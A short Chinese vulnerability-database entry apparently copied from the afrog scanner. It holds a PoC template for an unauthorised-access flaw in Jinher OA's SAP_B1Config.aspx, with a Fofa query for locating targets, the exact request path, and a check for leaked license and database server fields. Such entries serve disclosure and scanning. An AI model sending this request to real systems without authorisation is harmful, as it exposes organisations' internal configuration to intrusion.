jinher-oa-sap-b1config-disclosure: 金和OA SAP_B1Config.aspx未授权访问漏洞

日期: 2025-09-01 | 影响软件: jinher-oa-sap金和OA | POC: 已公开

漏洞描述

Fofa app="金和网络-金和OA"

PoC代码[已公开]

id: jinher-oa-sap-b1config-disclosure

info:
  name: 金和OA SAP_B1Config.aspx未授权访问漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa app="金和网络-金和OA"
  reference:
    - https://mp.weixin.qq.com/s?__biz=Mzg2MjkwMDY3OA==&mid=2247484635&idx=1&sn=485937343b296937a78c132c3dfdb71b&chksm=ce019c72f976156477da4fd7c5efb6b6e61ac05646241d302e4d17ec6b230cb79e55aa8b981e&cur_album_id=3090557023571722241&scene=189#wechat_redirect
  tags: jinher,oa,disclosure
  created: 2024/01/16

rules:
  r0:
    request:
      method: GET
      path: /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'txtLicenseServer') &&
      response.body.bcontains(b'txtDatabaseServer')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jinher-oa-sap-b1config-disclosure.yaml

相关漏洞推荐